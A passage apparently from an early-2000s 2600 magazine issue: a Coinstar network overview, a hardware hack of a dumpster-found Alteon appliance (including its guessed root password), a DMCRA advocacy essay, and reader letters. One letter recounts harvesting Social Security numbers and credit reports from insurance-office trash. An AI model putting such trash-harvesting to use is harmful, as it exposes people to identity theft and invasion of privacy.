"Coins, preferably after cleaning, e.g. using a trommel, are singulated by a coin pickup assembly configured to reduce jamming. A coin rail assists in providing separation between coins as they travel past a sensor. The sensor provides an oscillating electromagnetic field generated on a single sensing core. The oscillating electromagnetic field is composed of one or more frequency components. The electromagnetic field interacts with a coin, and these interactions are monitored and used to classify the coin according to its physical properties. All frequency components of the magnetic field are phase-locked to a common reference frequency. The phase relationships between the various frequencies are fixed, and the interaction of each frequency component with the coin can be accurately determined without the need for complicated electrical filters. In one embodiment, a sensor having a core, preferably ferrite, which is curved, such as in a U-shape or in the shape of a section of a torus, and defining a gap is provided with a wire winding for excitation and/or detection. The sensor can be used for simultaneously obtaining data relating to two or more parameters of a coin or other object, such as size and conductivity of the object. Two or more frequencies can be used to sense core and/or cladding properties. Objects recognized as acceptable coins, using the sensor data, are diverted by a controllable deflecting door, to tubes for delivery to acceptable coin bins."
Prior to entering the actual sorting mechanism, the coins are run through a process which sorts out any debris, including washers, paperclips, and anything else that might be in a jar of coins. These objects fall into a plastic tray above the sorting mechanism, and are not returned to the user.
The coins then fall into one of two bins: an all-pennies bin (pennies make up much of Coinstar's business) and a bin for the rest of the coins. In actuality, the coins must be taken by armored car to another sorting facility where they must be sorted once again, as a treasury requirement.
When the process completes, a receipt is spit out of the receipt printer, with several security features: (1) The Coinstar logo is displayed on the right and left side of the tape when held under ultraviolet light; (2) On the rear of the receipt, there is a small box with nothing in it. If a coin is rubbed across the box, the Coinstar logo appears.
However, far more interesting than the actual machine is the Coinstar network. Each machine contains a modem and a phone. Each machine dials the Coinstar headquarters every night and downloads the day's usage statistics. These include the number of coins counted, what types of coins were counted, the number of transactions, the average dollar amount per transaction, and the reject percentage (used in determining if a machine is rejecting an excessive amount of coins, which is cause for a technician to be sent out to examine it). A normal reject percentage is around one percent, however slightly higher percentages may be simply due to people inserting all kinds of foreign matter into the machines.
In addition, the machine analyzes the last week's worth of usage statistics, and estimates the day it will be full. An armored car will then be scheduled to empty the machine on that day, or possibly earlier. The machines also contain diagnostic software that will automatically page a technician if a problem occurs.
Occasionally, Coinstar sends software updates to the machines to fix bugs, add features, and advertise promotions. These updates are also downloaded to the machines during this time period.
All of these statistics are stored on servers at Coinstar's headquarters in Bellevue,
Washington, and many employees can access them over the network through software loaded on their computers. I received a tour of the headquarters several years ago, and at the time all the servers were running NT 4.0.
I did notice another interesting feature while at Coinstar Headquarters. They had a row of machines, dating from the earliest machine through their future models that had not yet been released. Some machines were on and functioning, others were off. However, one (a current model) displayed a "Press CTRL-ALT-DEL to logon" message, as commonly seen in Windows NT 3 and 4. For this reason, I have a suspicion that the machines run some form of Windows in the background, or at least have the capability to do so.
In addition, the machines contain a phone that is linked directly into the Coinstar network. If a store employee needs to schedule maintenance, check the next coin pickup, or do any number of other things, he just needs to open the machine (it is locked with a key) and pick up the phone. Also, when the machine is opened, a pin code must be entered to obtain access to the diagnostic software, statistics, and to change the options of the machine. This code is also needed to access the phone. I personally have not had the opportunity to access this part of the machine, mainly due to the lock and the security cameras right next to it (however, the lock is the main obstacle).
For all its ease of use, a lot of technology sits behind the green plastic of a Coinstar machine, much of which I still have yet to uncover.

by phantasm
phantasm@textbox.net
Among many of the things I love to take part in, dumpster diving always has that small thrill of actual treasure hunting. Sooner or later you are bound to find a manual with enough information to keep you reading for a few days or even months. Other times you may get lucky and find an old computer that has parts you can use.
A few months ago, during my weekly dive excursion, I happened to stumble upon quite a treasure in my favorite dive spot. On top of the dumpster sat a beautiful green system, just under 18" wide, 24" deep, and 17 inches tall. I was quite excited about finding something aside from the usual post-it note about where they were going to eat, or the regular office memo to put cigarettes in the ashtray outside and not on the sidewalk.
I dropped my umbrella, and after a few attempts to get to the top of the dumpster, I made it and put it in my car. Unsure of what exactly it was, I dug around a bit more for a manual or something about it and found nothing.
Later that evening I got home and peeled it apart, noting it was quite compact internally. Inside were three PCI slots used by a Fiber Gigabit Ethernet adapter and two CryptoSwift SSL cards. The CPU was an Intel Celeron 500, 64M RAM chip, and a 64M CF card as its drive. Looking more into it, I noticed there was no keyboard port, or a video connector at all, so getting into a console would be a slight challenge.
After writing down part numbers, I put it back together and did a few searches. It appeared I had an Alteon iSD-100 and off I was on a search for technical documentation.
Hooking it up and attempting to power it on, I found the power button was broken off. A pen tip was all I needed, and the whir of the fans chimed through the room. Running a serial cable from its serial port to my system, I tried to get a console that way with no luck. After a bit more reading, I discovered a need for an Alteon WebSwitch to access the system. So it was time for a lot more research.
The board inside was labeled Teknor Applicom, Inc., with a PCI-946-1 system board.
By using a PCI Video Card, I was able to remove the Fiber card and replace it to get a video output of what was going on during boot. I was quite pleased to see the system was fully functional and booting fine.
The manual for the board showed the pinouts for its connectors, which was a wonderful help. I was able to find the keyboard interface information in the manual (page 108 of the PDF), and set out to find a way to add my own. With an old P-II board that got fried, I cut out its PS/2 keyboard connector with some snips, removed the excess solder from the pins, and cleaned it up for a better connection. I had to figure out a way to set up the connector around the way this case was set up. In the true form of imprecision, I grabbed a nice length of Cat5 cable (once again found dumpster diving) and stripped the ends of the wires bare for a connection.
After some solder work we had the wires connected to the PCI-964 board and ran the Cat5 to the back of the system to another hole provided for another serial port. The connector was soldered on at the other end and some electrical tape to guard the bare wires and pins from the case.
Plugging up a keyboard, I started it up and saw the damage that could be done. During the BIOS load, the keyboard lights came on, and Red Hat Linux began to boot. Staring at the Login/Password prompt I was quite excited. Of course I started with a quick basic guess for root with the password alteon and there I sat at a working console. A quick browse around to see what was there and I powered it down.
I removed a crypto card and popped in a 3Com NIC, rebooted, brought up the interface, and turned on SSH. A few changes to set it all up automatically for me,
another power down, removal of the video card, and brought it back up, I now had a system to play with at my desk for more comfort.

From there I got a bit more curious and wanted to expand the system some more. I added 256M of RAM, then attempted to add a 20Gig HDD and a CDROM. I didn't have much luck with that, but found out if I removed the CF card I could use the HDD on /dev/hde where the CF used to be. After a bit more playing, I got Linux installed on the 20 Gig drive on /dev/hde and it was working fine as a home server. The system provided me with well over a month of fun and learning, as well as some interesting calls to Nortel trying to understand the BIOS and restrictions set into it. Granted I did not get much information - it was brought to my attention that reselling it required removing and adding a new BIOS chip which I am too lazy to do.

The moral of this long winded article? Dumpster diving can provide you with expensive treasures and a long time of fun and learning.

Thanks to 404 and Tyler for assistance on systems running CompactFlash cards and the rest of Textbox Networks for help on other areas of learning the system.

Related Sites
Alteon Users Guide: http://www142.nortelnetworks.com/bvdoc/alteon/isd_ssl/050125.C.pdf
Teknor Applicom PCI-946-1 Hardware Guide: http://www.kontron.com/techlib/manuals/PCI-946H_and_P3544QBX_manual.pdf

DMCRA

The Digital Millennium Copyright Act (DMCA) and the Digital Media Consumers' Rights Act (DMCRA) are at the opposite ends of the "copyright rights" axis, so to speak. Representative Boucher and Doolittle's DMCRA will amend the changes made by the DMCA to prevent the corporate abuses of power that have been possible under the DMCA.

The DMCA was enacted in 1998 to take effect in the year 2000. The DMCA modified the U.S. copyright statutes to provide protection for copyrighted digital material. Since 1790 Congress has made modifications to the U.S. copyright statutes to accommodate new material. The DMCA is just the next step in the series of modifications to the copyright statutes. There were other reasons for the DMCA's enactment. At the 1996 World Intellectual Property Organization Diplomatic Conference, the U.S. adopted the World Intellectual Property Organization treaty. There was a perceived need to comply with that treaty: the DMCA made that compliance but added much more than was necessary. Copyright owners were rightly concerned that their works would be pirated on the digital frontier.

Congress did not intend for the DMCA to be abused as it is today. The DMCA was enacted to clear the gray area of pirating copyrighted digital works and to ban the "black box" type devices intended for that purpose. In practice it has worked to that end and beyond. The new clauses and provisions to the copyright statutes have been abused aggressively to stifle and control many legitimate activities. The DMCA added anti-circumvention measures to the copyright statutes that forbid under penalty of law gaining access to a work by "circumventing a technological protection measure that would otherwise effectively control access to a copyrighted work". The DMCA also prevents the import, manufacture, or export of any device that can circumvent that protection. By doing this the DMCA gives copyright holders complete control over their works, no matter what the circumstances.

Historically, the U.S. copyright laws haven't given copyright holders this total control. A major "safety" on this type of control is the fair use doctrine. Fair use allows the end user to make copies of a copyrighted work for personal use, educational use, use in commentary, criticism, and parody or any other solely socially beneficial use. A work protected by the DMCA cannot be copied by the end user without the express consent of the copyright holder.
This completely nullifies the fair use doctrine and tilts the balance of power dangerously toward the copyright holders. By the same means the DMCA takes away the rights of First Sale and Limited Time. First Sale gives the end users the right to sell a copy of a work over and over once it is made. Limited Time limits the time that a copyright is in effect. The copyright is granted for a limited time and after that time is up the work goes into the public domain. The power that copyright holders now have over these rights is shown in their use of the DMCA.

Dimitry Sklyarov, a young Russian Ph.D. at Moscow University, was invited to speak at Defcon about some of his research. His speech outlined Adobe's e-Book security and its weaknesses. He and his company had developed a program that allowed the end user to make copies of an Adobe e-Book, which was completely legal in Russia but illegal under the DMCA. He was arrested. Not for copyright infringement or for helping anyone else infringe upon copyright, but solely for citing weaknesses in e-Book security. He was arrested because someone he never met might use what he learned through his research to copy an e-Book without the publisher's permission. Adobe used the DMCA to punish Sklyarov for speaking out about his research. After months of imprisonment Sklyarov was finally released under an agreement with the Department of Justice. After his release the DMCA continued to prosecute his employer, ElcomSoft, under the criminal provisions of the DMCA. ElcomSoft is based in Russia where there is no DMCA. The DMCA is reaching across continents to stifle free speech.

Prior to this, the Motion Picture Association of America (MPAA) brought suit against 2600 Magazine for publishing DeCSS on its website. DeCSS is an open source application that allows Linux users to play DVDs. DeCSS's primary use is a DVD player.
It also has the ability to change file formats from DVD to MPG, which is like playing a DVD and recording it to a VHS tape (which is, again, legal under the fair use doctrine). Because it can do this it has become the target of the MPAA through the DMCA. 2600 was not accused of being involved in the development of this tool, nor was it accused of having used the software for copyright infringement. The lawsuit was brought upon 2600 simply for making the source code available. Free speech was denied to 2600 when they were enjoined from publishing the DeCSS source code. 2600 lost the case and lost the appeal. Some good can be said to have come of this though - it was decidedly the most public display of the dangers of the DMCA yet. The case provided a wake-up call to the hacker community and gave the world a glimpse of what corporations can do with the DMCA.

In September of 2000 the Secure Digital Music Initiative (SDMI) issued a public challenge encouraging the hacker community to defeat new watermarking technologies the SDMI hoped to use to thwart piracy. Professor Edward Felten and his team of researchers from Princeton, Rice, and Xerox took up the challenge and succeeded in circumventing the watermark controls on the music files. When the team tried to show their research at the 2001 Usenix conference, the SDMI threatened Felten with the DMCA. The threat was in the form of a letter that was delivered to Felten and his team as well as their employers. Sharing research such as Felten's is common practice in the computer science field. It shows others' mistakes and can only lead to better solutions. If Felten and his team presented their research the original security technology would of course be compromised, but many would offer suggestions to improve or replace the weak technology.
Even after SDMI had given Felten and his team permission to circumvent their watermarking technologies, they were still able to revoke the right of free speech with the DMCA. Felten's team brought suit against SDMI and subsequently made a partial release of their research.

Prominent Dutch cryptographer Niels Ferguson recently discovered major flaws in a commercial hi-definition video encryption system. Ferguson rightly fears legal action under the DMCA and has therefore declined to release any of his work. He doesn't talk to his peers and scientific colleagues for fear of his research simply reaching the U.S., which he thinks could be interpreted as a violation of the DMCA. This shows the beginning of a horrible trend. Scientists are withholding research or simply avoiding the U.S. out of fear. Scientific development in the U.S. is being stifled for the benefit of the corporation. Scientists now fear the U.S. They fear the "Land of the Free" because corporations are given power over individual rights.

The DMCRA will give that power and the rights back to the consumer. This bill will restore the historical balance between copyright holders and the end user. If this bill passes in the next session, the rights that the DMCA threatens will be restored. It will reaffirm the fair use doctrine in the digital world, making it legal to circumvent a technological measure preventing access as long as the circumvention falls within the guidelines of the fair use doctrine. It adds exemptions for scientific research which reestablishes the Betamax standard. The Betamax standard would, in the digital world, allow the manufacture and distribution of software or hardware that can be used to circumvent technological protection measures as long as it has a legitimate use.
The reestablishment of the Betamax standard would put scientists at ease and encourage scientific research to continue as it always has in an open forum style without fear of prosecution for discoveries. Security can again be developed, unimpeded by the DMCA. Proper labeling of "copy-protected CDs" will also be ensured. This new breed of CDs, marketed as regular CDs, have been known to have playback problems and have also crashed quite a few computers with their aggressive protection measures.

This bill has already won the support of many major public entities. The supporters include: Intel Corporation, Philips Consumer Electronics North America, Sun Microsystems, Verizon, Gateway, Consumer Electronics Association, American Library Association, Association of the American Universities, Association of Research Libraries, American Association of Law Libraries, Medical Library Association, Special Liberties Association, Digital Future Coalition, Consumers Union, National Writers Union, Home Recording Rights Coalition, American Foundation for the Blind, and the Electronic Frontier Foundation. Many of the supporters are library or writer associations of some kind. It can be inferred that the libraries and writers may fear the DMCA as the means to an end of an era, an era of free speech and fair use.

The way is now clear - the public's rights are threatened and the DMCRA is their boon. Libraries and writers across the United States gather under the DMCRA's flag. Without the DMCRA organizations like the MPAA gain more of a foothold in our society. Organizations like the Electronic Frontier Foundation have long known the effects of the DMCA and the power it grants to corporations. The MPAA's actions have paid off, but not in their favor. The average citizen has at least heard of the DMCA and many have now joined the fight against it. When the DMCRA is enacted, the power will be returned to the people.

Greetz: Kahian, Zim, Bill and Ducky.
Save Farscape.

Spreading News

Dear 2600:
Some readers may already know this, but sneakemail.com is a service that allows one to generate disposable email addresses that forward to your real address. It provides a self documenting method of tracking who sells your email address so that you can confront those companies with proof that they sold your address.
NoSpa tim

Dear 2600:
In 19:2, you printed a letter from one "MW" who was asking about how to send anonymous faxes. For a small fee, this person could use an e-fax service such as www.maxemail.com to send a fax anywhere the user accesses the Internet. Using a good proxy server or other anonymous access point would allow the user to send an anonymous fax.
Along these lines, users wishing to receive anonymous faxes may find the free services of www.faxwave.com to be useful. They assign you a unique phone number (no extensions!) and receive the faxes for you. Upon receipt, the transmission is converted to a .tif file and emailed to any email address of your choosing. All numbers are issued from the 775 area code and the exchange varies but is usually local to Reno, Nevada.
Keith

Dear 2600:
This is regarding the fax from Direct Media America on page 13 of 19:3. Looks like there's an ongoing investigation of Direct Media America by the Florida Attorney General.
scott

We certainly can't say we're surprised.

Dear 2600:
Many people probably already know about this, but www.payphone-project.com/ is a website with the phone numbers to thousands of payphones all around the States.
Sfctrdonicus

Hopefully the kind that still take incoming calls.

Dear 2600:
I truly admire your magazine and how hard the staff of 2600 works to show us the information which the government and corporations try to control and distort.
You're a group that the government tries to suppress like any group that stands against the system, one that will be targeted by those in "control" just to protect their own interests. Soon I'll be starting a 2600 meeting here in Puerto Rico with technological themes and political issues too, highly influenced by your magazine. You people are an inspiration for the hacker community and I really appreciate your struggle and years of dedication.
cyhernurd

We wouldn't have gotten anywhere without our readers' support. They've made everything possible.

Terrorism Related Issues

Dear 2600:
Anyone else notice the eerie resemblance between 9/11 and its aftermath and Brain Damage's 2/9/91 broadcast?
Tresser

You're referring to an early radio broadcast on our website that theorized on the possibility of some kind of future attack on U.S. soil as a result of the Gulf War. Many people around the world had also considered that possibility. And when the attacks came, it woke a lot more people up to the fact that our foreign policy can come back to haunt us right here.

Dear 2600:
This letter probably won't be the only one you get on John Messner, who has been getting a bit of attention on the news lately for "hacking" alneda.com, an Al-Qaida website. He didn't really "hack" anything and it's just another example of how loosely the term is used. He just decided to give one of those domain snatching services (snapnames.com) a try and got lucky when the owners of alneda tried to switch name servers.
I'm writing because Messner is being made out to be some kind of geek hero in the news. I don't think he is. In fact, I think he's the exact opposite of what computer enthusiasts want to be identified with. First of all, he's a porn king (having started some really successful girl-next-door type site) which some people might find to be cool or whatever. I think it's just disgusting.
Second of all, the only thing he did was get lucky with that name snatching service, which takes zero intelligence and only enough "skill" to fire up Internet Explorer. I had my name snatched by one of those things about a year ago and had to pay i bucks to get it back. Not cool at all - they should be illegal. Regardless of whether it was a terrorist website or not (actually it was just a pro-Islam site, but hey what's the difference after the 11th anyway?), those types of services are just bull and exploiting them like that is completely against what being a hacker is about.
I'm all for fighting terrorism but this is just another example of someone taking it too far and the media glorifying it. We've already got the DMCA and Patriot Act to worry about - I don't want to have to look over my shoulder for vigilante porn bosses that want to get ahold of my website because they think they are somehow fighting terrorism. It also should be noted that alneda.com now links to a forum where people discuss world issues such as terrorism. Most of the talks there are one-sided as can be expected. For those of you who care, I am a born and raised North Carolinian (just in case it sounded like I was someone who didn't have any investment in the issue of terrorism). Thanks to 2600 for continuing to fight the good fight. I hope you guys agree with me on this, but if not I'm sure you'll explain why.
jmu

This raises a number of interesting points. From our understanding, the owners of alneda.com simply didn't renew their domain name in time and someone else grabbed it. It's not quite the same thing as stealing the domain; it's really just a contest to see who's paying attention and, unless the name is part of a trademark, there's not a lot that can be done about it. It may seem unfair but if a domain is expired, it no longer belongs to anyone.
What snapnames does is interesting - they will keep this from happening to you if you pay them and they will attempt to grab names you pay them for the moment they expire. We see no reason to outlaw this as they're not doing anything wrong. Ultimately their service will become ineffective as more such companies pop up. If it can be proven that they're accepting money from both the domain holder and the person who wants that same domain, that would qualify as a ripoff in our book. As for what's currently on the site, it's a free speech issue. From what we've seen, anyone is welcome to participate (not that they're obligated to allow this). What the person(s) behind it does for a living is really immaterial to this, as is identifying what state you happen to be from. Nobody's opinions are more or less valid because of their background or location. What we can agree on is that this really doesn't have a whole lot to do with hacking - it's simply about paying attention.

Dear 2600:
I know as do all of your other readers that you are against even the so called white hat hacking even if the site being attacked is an enemy of the state. But I would have to say that this is just the kind of thing that we in the hacking community should be doing. I do agree with you however that the attacking and redirecting of their funds is crossing the line. But there's nothing wrong with gathering "intel" on their agents, their movements, their strength, etc., and passing it on to the appropriate channels so that appropriate plans can be made, as well as the monitoring of their electronic fund transfers as that will also give us intel on what they are planning. I would also have to say that we should support those who like Jon Messner through legal means took over ownership of a particular domain name.
And considering that he did legally purchase the aforementioned domain name when it was not being used (even if it was just for a "split-second," it was fair game), he did so in a fair and legal move.
Herman

As we said above, using an existing system to gain an advantage isn't the problem. But those who believe they should act as judge, jury, and executioner are deluding themselves. How do you suppose you're going to be able to track down "enemy agents" in the first place? They don't exactly advertise their presence. And if you're going to turn anyone in to the authorities who espouses an objectionable point of view or runs a controversial website, we're going to be facing problems of an entirely different nature.

Dear 2600:
In your response in 19:1 to a letter about cracking bank accounts ("Tracking Terrorists"), you said, "If you really want to help, the best thing you can do is be observant and notice things that other people may not notice. Then let people know what you see." It seems to me that this goes against your opposition to the TIPS program. The TIPS program is really nothing more than a way to gather information that people had no easy way of reporting before. But of course people can't handle the fact that instead of having important criminal activity info reported to thousands of different sources, they want one contact point. There have been anonymous tip lines for other things for a long time. One that may help stop and solve crime doesn't sound that threatening to me.
PLMN

There's a difference between being observant and being an informant. We encourage the former, meaning we believe people should notice things and tell the world what they see. It's kind of our theme. Encouraging people to report any "suspicious activity" of their neighbors (or total strangers) to the authorities is about the most unhealthy thing our society needs at this point.
Dear 2600:
So I was there waiting in line at the local FedEx for my laptop to come back from being serviced. I was behind three gentlemen of Middle Eastern nationality. Two of them were at the counter talking to a lady who worked there. I think they were trying to figure out when a package was going to arrive at its destination. Anyhow, while I was looking at my slip, I glanced over at the very quiet third man who was sitting in a chair in front of me. He had a piece of paper and a manila envelope in his hand. On the white piece of paper he had written everywhere "INS.DA.DOJ.DO?" (I couldn't make out the last character). This was written everywhere, on both sides too. Then he flipped his hand over and on the envelope he had a bunch of words written like a list or address. The only words I could make out were [something] Middle School. That's all I could get before he got up to leave with the other two men. I don't think the envelope had been sent yet because the stamps didn't appear to have been crossed out yet by the post office. There were big stamps on it with pictures of a man with a hat on like Eddie Murphy wore in The Golden Child. The first thing that came to mind when I saw the characters on the letters were those letters with the anthrax. I didn't get their license plate for further tracking but they were driving a late 80's silver Honda Accord. My second thought was why the hell would an international terrorist just walk into a building holding "evidence?" So what the hell do I do? If I let it go and they kill someone, I am a bad person. If I call the police and he turns out to be practicing his English or he was just sending money to his family, I am a bad person. I haven't judged yet, but what would you do? I turned to you guys because you're probably the most neutral people I know. Any input would be appreciated.
Lectoid

This may be the first time we've ever been called neutral.
It's important in a case like this to take a step back and look at the conclusions you've already reached. People of Middle Eastern descent are considered suspicious by default. Would you have given the same amount of scrutiny to someone who looked more like you? This guy being quiet also made you suspect something. But what's so unusual about someone being quiet while they wait in a chair for someone? As for the letters he was scribbling, are we really to believe that such a thing is a suspicious activity? Even if he was writing down the name of every government agency he knew, so what? Having the words "Middle School" on an envelope really isn't that unusual either. We're not faulting you for having this thought process. What we're doing is asking you to examine it and try and understand why these simple actions could somehow plant the seeds of suspicion in your mind. Then imagine the entire country thinking along the same line. The fact is you will not know if someone is up to something evil unless you know them very well or are highly trained in spotting such activity. There are a few lucky exceptions to this but they tend to involve rather large clues, none of which were apparent here. You can rest assured that you didn't do anything to make you a bad person.

Dear 2600:
So why not put the army of 2600 to good use? Have you seen sites like www.jehad.net? They blatantly advocate the killing of American civilians and praise the September 11th attacks as acts of God. Why not point the readership to a couple of these websites and let them practice their skills?
Surf gods

Skills? You mean like getting Linux to run properly or installing secure encryption? Or perhaps by skills you mean something destructive which is apparently what you think the hacker world exists for. You have to realize that the Internet represents the entire world, not just the United States.
And that means all kinds of philosophies - some of which may seem abhorrent - are represented. Destruction isn't the answer - you have an opportunity to see something firsthand and accept or reject it for your own reasons - as an individual. You don't need some group acting on your behalf or telling you what to think. How would it be if in real life a group of fellow citizens went around destroying people because they didn't like what they were saying about us or because of major differences in philosophy? OK, that was a real bad example....

Dear 2600:
We must never forget that the attacks of September 11th were above all else an attack on the American way of life and all that it stands for. Our Constitution protects us from abuses of power by our government, the very abuses that are so common by the governments of countries like Iraq which back terrorism. If we allow our government to take away any of these freedoms, then the terrorism will have won a great victory.
In Washington it is sad to see that many politicians who claim to support small and limited government have worked to extend government power to such a huge extent. The few voices of dissent have been for the most part drowned out. At the same time though, it has made for odd alliances. For example, some right-wing Republicans and liberal groups like the ACLU have found common ground in opposition to new government powers. The only way for us to fight this extension of government authority is to find people who think likewise in all parties, in all organizations, and join together to send a message to our government that we must not let the terrorists win by altering our way of life.
LordKhamul

Be careful not to fall into the propaganda pit regarding who is evil and who is not. There are many countries with as bad or worse human rights records as Iraq who our government supports.
We certainly don't want to defend their despotic regime but no definitive proof has ever been presented linking them to the attacks nor have they been caught acting aggressively outside their borders or planning to since the Gulf War. Something else seems to be at work in our latest drive against them. Not that it's any comfort at all, but terrorist acts against our people have probably got nothing to do with our way of life and everything to do with what our government is doing in our name in other countries. This makes it especially important to know exactly what that is and to know where we as individuals stand. We also have to keep our eyes open for those right here at home who oppose the American way - not those who dissent, speak their minds, or represent something different. The real enemies are the ones who are trying to change the rules and wipe away any semblance of due process that hasn't already been destroyed - all in the name of their twisted definition of patriotism. As you've pointed out, fighting this goes across all party lines and requires only intelligence and open minds.

Dear 2600:
I was just reading your newest issue (19:3) and in your intro ("Freedom's Biggest Enemy") something caught my eye. "Operation TIPS (Terrorist Information and Protection System) which proposes having members of the general public spy on people they come in contact with, looking for anyone or anything out of the ordinary."
Well, I'm no history buff but this really sounds exactly like the same thing that Hitler did. I remember reading a book (and I can't remember which) where the kids would even turn in their parents for doing something kind of suspicious. And I'm honestly wondering, and have been wondering for a while, if this is the direction our country is heading in. Haven't we learned from history? I would like to think so, but somehow I can't seem to convince myself we did. Oh, but it's not like this hasn't happened before.
Ever heard of McCarthyism? It all started with Senator McCarthy who had a list of known "commies" working for the government. Their lives got destroyed. He asked people to turn in anyone they thought was a commie. The only way out of it once you got called in was to name other people. If you didn't name other people, then you were a commie too. (Doesn't this kind of stuff just piss you off on how dumb people are?)
Hells-own

One thing that always happens during these dark periods is the emergence of collaborators who go along with such things and individuals who stand up and fight them. One thing we can almost guarantee is that you'll be very surprised who winds up in each camp.

Dear 2600:
Just wanted to let you know - your bright light is soon to be extinguished. One more major terrorist attack and your (and your type's) relevance will cease, your moment will have passed. This is the price you will pay for your arrogance and ignorance of human nature and history. Thinking any societal structures are infinitely perfectible - what dreadful nonsense. Don't blame anyone else (da man) for loss of civil liberties - look at da man in da mirror. When security and law and order are recklessly neglected and chaos and uncertainty threaten, the balance of societal priorities shifts. To quote Aragorn: "Are you scared? You're not scared enough." Better get used to your nightmares, they ain't going away anytime soon. Enjoy the darkness. P.S. I hear BuSpar is good.
KrOOIee-O

It may be a paranoid reaction but sometimes we get the distinct feeling that there are people out there who don't like us.

Dumpster Diving

Dear 2600:
In response to your article on dumpster diving, in the UK a (creepy) chap called Benjamin Pell did this for a living, feeding info to the press and is estimated to have made over one million pounds from it. Test cases in the UK have decided that even though trash has been thrown away, it still belongs to the thrower, and is not "public domain."
Funny old world.
Paddy

Dear 2600:
Just thought I'd add to Grifter's brilliant article in 19:2 about dumpster diving. Another great place to dive is behind small insurance sales businesses. No locks, no shreds, and especially, no food. I've found stacks (big stacks) of personal info like addresses, phone numbers, socials, credit reports, etc. Grifter brought up a nifty idea with the cardboard boxes as an excuse. That tidbit would have gotten me out of a few jams when I found running to be very necessary. Apparently backpacks aren't a good idea either. Happy diving!
Nomad

Dear 2600:
Great article on Dumpster Diving by Grifter in 19:2. Others who are interested can join fellow divers in the alt.dumpster newsgroup in Usenet for all sorts of discussion, etc. There's a lot to learn and we share information with all. No flames or trolls, please.
Slinky

As if merely asking made the flames and trolls go away.

Feedback

Dear 2600:
I have been following the topic of right click suppression in your magazine for the last couple of issues and decided to put my two cents in. I am a photographer and on my website, my gallery images have right click suppression on them. The reason for this is rather interesting. I feel that if you really appreciate an image that I have and want to have a copy of it, you should either contact me or, even better, find a way to work for it. This is one of the basic parts to hacking in my book, finding new ways of learning. It is not harmful or destructive, and if you find a way around something, then you have learned something new. Props to you, and keep up the good work.
Traveler

Dear 2600:
In response to Erovfs comment about script kiddies and the ratio of master to newbies:
The way our world is now is fine when it comes to the script kiddies and the masters ratio. Both have different goals. The masters' goal is to expand their abilities and show off by creating the program.
Recognition for the program is among peers, not by the ignorant majority that is clueless to the true art of anything they do. Masters are happy how they are, programming. Script kiddies find joy in just breaking into school computers and by petty acts of malice that bring recognition by the ignorant masses. That makes the script kiddies happy. As long as everyone is happy, what's the problem?

XiChimos

We weren't aware that everyone was so happy. Perhaps we could join in a chorus of Ode To Joy if the people committing "petty acts of malice" stopped calling themselves hackers to the ignorant masses.

Dear 2600:
I just finished watching Freedom Downtime two minutes ago. I finally got around to ordering it and as soon as I got home and saw that package in my mail I opened it up and popped it in the VCR. I just want to say I thought it was great. I especially enjoyed the Miramax protest and your across the country trip to get the word out about Kevin. I plan on making copies and giving them to my friends; I also hope to have a showing at my school. Thanks for taking the time to make such a great film and keep up the good work.

joe

Dear 2600:
I just read the article in 19:2 about doubleclick.net and how evil it is, as well as the letter with a solution involving iptables. This is all fine and dandy, but it definitely looks like killing a dog with a cruise missile. The first thing I did was start up Mozilla and see what it had in its preferences, and I saw that not only does Mozilla have reasonably flexible cookie blocking stuff, it has image blocking stuff as well. Here's the easy two-step process that doesn't require firewall software or root access (a definite selling feature on those lovely university unix labs):
1.) Change your cookie setup. Only accept them from the originating web site and tell it to ask before storing a cookie.
Mozilla can remember your decision about cookies, so the dumb popups are a one-time affair for sites you visit regularly.
2.) Find a site with doubleclick.net ads. I googled for "funny puppies" and won on my first try: "block images from this site" on the ad (right click, duh).
I'm moderately annoyed that they didn't let you add sites to block images from in the preferences menu, but you can't win them all, I guess. I don't know what they manage to squeak by with javascript, but Mozilla lets you disable javascript's access to cookie data, its ability to make cookies, change images, and so forth, so it can probably be mostly curbed. The preferable solution would be to ignore javascript and images based on a configurable list of keywords. Opera has similar features, but I don't think they're as complex. IE's approach to this seems to be along the lines of telling the user, "don't try to hide from my money grubbing masters or I will crash your computer." I haven't checked konqueror yet.

Bob M.

Dear 2600:
This is a response to a letter written by que! in 19:2 which suggests blocking web ad images by adding each image server IP to Linux netfilter rule tables. There are several much easier ways to block ads, such as:
1.) Add the server's name and the address 127.0.0.1 to your /etc/hosts file. (Windows has a hosts file too at C:\windows\hosts or C:\winnt\system32\drivers\etc\hosts.)
2.) Use a browser (such as Mozilla) or browser plugin that can give you better control over the images that the browser downloads and displays.
3.) Most importantly, try out a personal web proxy such as Privoxy, Adzapper, Web Washer, or Guidescope. If you haven't heard of any of these, Google is your friend.

Eil

Dear 2600:
Thanks for publishing so much discussion of the gun control issue. Despite the fact it is not directly connected to hacking or freedom of information, your readers seem to be very interested in it. I'm a new reader who picked up a bunch of back issues at H2K2,
and I've been following the debate backwards to 18:3. I'm sorry you don't support the right to bear arms the way, say, American Rifleman (the main NRA magazine) supports freedom of information. I would like to point out a nonsense statement: "If only hackers were treated as well as gun owners in the United States!" Violation of the DMCA of 1998 carries a penalty of up to five years in prison for a first offense. Violation of the NFA of 1934 (for example owning what the DoD calls an assault rifle, sawing off a shotgun, or making your own gun of any kind) carries a penalty of up to 10 years in prison. I also feel (although this is more subjective) that the plethora of laws governing firearms ownership are more onerous; I've never been fingerprinted in order to buy a packet sniffer, or had to appear in person at the sheriff's office for a license to carry a password hash cracker. I do not risk five years imprisonment for forgetting to clear some software off my laptop when I go to visit my parents in New Jersey; if I accidentally leave any standard hunting ammo in my car, I risk that.

Charles

If you act like an idiot with deadly weapons, you should be prevented from continuing to do so. It's amazing how many people see that as a violation of their rights yet will blindly support idiocy like the Patriot Act without a second thought. What we don't support is the attitude that anyone who suggests any form of regulation of firearms is somehow advocating disarming the populace, no doubt in furtherance of some hidden agenda. It's an hysterical reaction that only manages to demonstrate how bad the problem is. There are all kinds of legitimate reasons to own guns. But, being deadly weapons, they cannot conflict with the needs of society. That's why we frown upon walking around schools and churches with firearms, regardless of what you think the Constitution says you can do. It's why deranged individuals tend to be discouraged from becoming gun hobbyists.
These directives are coming from the people, not from some invading government. If we can get major politicians clamoring for the rights of hackers and the "National Hacker Association" challenging the government to pry our keyboards "from our cold, dead hands" then maybe hackers will have a chance of being treated better than gun owners. Until that day, it's an absurd comparison.

Dear 2600:
Regarding the cover of 19:2, I was wondering if that "building" that kinda looks like the U.N. is actually an integrated circuit that I've seen in some touchtone phones from the 70s and 80s, and the round "building" being a receiver or speaker of some sort. Is that right? I noticed because the "building" is not facing the same direction as any of the others. Nicely done! Thanks for your magazine - love every minute I read it.

ShadowfaxO

